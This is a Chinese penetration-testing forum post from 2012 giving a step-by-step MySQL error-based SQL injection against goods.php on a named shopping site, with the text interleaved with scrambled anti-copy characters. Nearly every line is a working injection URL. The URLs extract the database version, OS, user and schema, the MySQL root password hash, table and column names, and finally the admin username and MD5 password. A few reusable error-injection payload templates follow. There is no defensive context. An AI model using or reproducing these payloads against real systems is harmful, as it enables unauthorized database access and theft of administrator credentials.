找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 盲注详细内容
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 2057|回复: 0
打印 上一主题 下一主题

盲注详细内容

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2012-9-5 14:59:30 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
判断版本号 ' Z! m% s% r- I, v  N1 E8 X
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20@@version%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23! e/ F+ s6 d2 n. I6 d8 V( _
+ ^$ A+ _6 v7 x
判断系统
% W. d8 D$ `1 U6 I$ u' V
9 X+ R# G# u2 D% h6 L% i5 w+ {( \, nhttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20@@version_compile_os%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%230 ~+ M. G$ u) L$ D4 n

" V3 ~) m0 l6 b, X/ z+ }3 N
5 B1 Y" S. M4 S+ s* |7 ~; O' r1 w2 @6 z; c2 l; ~: b& `# A
当前 user()
$ W/ E. b8 Y8 b0 T: o, t1 y. c& z! e
& @2 p" w$ |# ]: a# v4 U: j/ shttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20user()%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23" M" Q9 a8 j0 u, r% G) a

! {5 C5 b$ ^+ y; B/ D% B
' G. V* u# ?8 K, E( T2 l" r
" A! X$ E5 \+ A4 g+ h( E当前 database()
2 D0 @+ @; d# h& K2 L3 o# ^, Qhttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20database()%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
4 R2 A" f3 g, M/ r( x
# F4 o4 \# L' H+ e9 `4 `* B
& Z( S; {# u2 l1 a& A
1 i* q! g, P) o' S" r% F: m
. u3 I9 q# X# }8 J! i3 l& v* kroot hash  T$ r& N; l2 K9 @/ Y: _

; }8 s* p/ l  U3 M6 N, ^) F' @  Q, Xhttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20Password%20from%20mysql.user%20where%20User=char(114,111,111,116)),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
& y  ~& @' U: s" B# Z6 \4 X
, G& O  _  Y% u! T$ ^- _  o* ]. C0 d& y7 o( K
6 @6 T. a' ^! J! I
当前 数据库表名
, u8 K! |& R# U
: ^7 z! x) Z0 O  q. Chttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20TABLE_NAME%20%20from%20information_schema.tables%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20limit%206,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23! E& ?8 G  K. {; S) _/ C
1 ]+ z9 m2 k) V, h& ?5 ^& m

" X/ W8 Z0 e+ F( q* T8 i
( V' Z+ u* m+ A% U& Z9 x0 `# K- b& s当前 数据库 user_name 字段# q; P7 G6 J0 M& A% ~# ?
# z  F+ o! t) J: b0 }& r( f
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20%20COLUMN_NAME%20from%20information_schema.COLUMNS%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20and%20TABLE_NAME=char(101,99,115,95,97,100,109,105,110,95,117,115,101,114)%20limit%202,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%231 q+ @- x2 C# j" ?! E

2 X, R7 f( R, u& O. I% |当前 数据库 字段 password
" W5 _: x" {4 ?* Ihttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20%20COLUMN_NAME%20from%20information_schema.COLUMNS%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20and%20TABLE_NAME=char(101,99,115,95,97,100,109,105,110,95,117,115,101,114)%20limit%204,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23* x2 _  U; t/ K: I8 S

6 {7 G8 J6 S! n" N2 |, A# S
3 C8 M1 e+ Y. b  h# x+ q1 e5 W3 G: O/ J, f. k
获得 admin passwd(md5)
/ i$ _) |2 L8 G" B, k* |
: p# J3 w1 [" `0 u1 G: T4 O2 C) `+ Y" {  i% l7 Q9 v/ L
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20concat_ws(char(94),ifnull(cast(%60password%60%20as%20char),char(32)),ifnull(cast(%60user_name%60%20as%20char),char(32)))%20%20from%20sansan1.ecs_admin_user%20limit%200,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23! }. F* n: m& v( s( J; F, a9 C# V' o& H

+ q2 m- ^8 v. f/ P! Z; K- i报错注射& L, A& o+ ?2 ^- l, l
SELECT * FROM table_name where uid = -1 union select 1,(select 1 from(select count(*),concat((select (Select version()) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a)
4 H: n/ n9 ?2 w( a( _7 a3 c! O
  i" a4 V( I6 J$ H* [3 U) kSELECT * FROM table_name where uid = -1 union select 1,(select 1 from(select count(*),concat((select (Select username FROM admin_table LIMIT 0,1) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a)
+ E1 d' H. u% X8 S# N, O" {; U0 p3 W6 q
and(select 1 from(select count(*),concat((select (select (Select concat(0x7e,0x27,SCHEMA_NAME,0x27,0x7e) FROM information_schema.SCHEMATA LIMIT 21,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表